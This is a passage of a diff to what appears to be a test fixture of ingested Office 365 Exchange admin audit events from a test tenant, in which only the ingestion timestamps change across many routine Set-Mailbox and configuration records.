bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -3755,7 +3755,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853210Z", + "ingested": "2021-12-14T14:49:28.056970830Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"8126fd52-b16b-45c5-6aff-08d7adfc0c97\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -3836,7 +3836,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853215800Z", + "ingested": "2021-12-14T14:49:28.056971372Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"70f24b65-0224-473b-49b8-08d7adfc0c83\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -3917,7 +3917,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853221900Z", + "ingested": "2021-12-14T14:49:28.056972043Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"515c88f2-2cbf-4214-2d9b-08d7adfc0e0f\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -3998,7 +3998,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853227700Z", + "ingested": "2021-12-14T14:49:28.056972527Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"02c7f756-40e0-4c47-d49d-08d7ac0f26bd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -4079,7 +4079,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853233400Z", + "ingested": "2021-12-14T14:49:28.056973011Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:02\",\"ExternalAccess\":true,\"Id\":\"40786a66-fbd5-4a24-d9af-08d7ac0f2a42\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -4160,7 +4160,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853239200Z", + "ingested": "2021-12-14T14:49:28.056973561Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"ebda487f-6177-432a-e91d-08d7adfc0d0d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -4241,7 +4241,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853245Z", + "ingested": "2021-12-14T14:49:28.056974016Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:51\",\"ExternalAccess\":true,\"Id\":\"93d5f028-263c-45f1-dcf9-08d7ac0f2378\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -4322,7 +4322,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853250700Z", + "ingested": "2021-12-14T14:49:28.056974688Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"1eea5379-4c86-4d6f-00cf-08d7adfc0e23\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -4403,7 +4403,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853256600Z", + "ingested": "2021-12-14T14:49:28.056975161Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -4473,7 +4473,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853262400Z", + "ingested": "2021-12-14T14:49:28.056975666Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -4543,7 +4543,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853268100Z", + "ingested": "2021-12-14T14:49:28.056976105Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"9edbf9fe-f844-401f-e9ec-08d7adfc1242\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", 
@@ -4624,7 +4624,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853274600Z", + "ingested": "2021-12-14T14:49:28.056976612Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 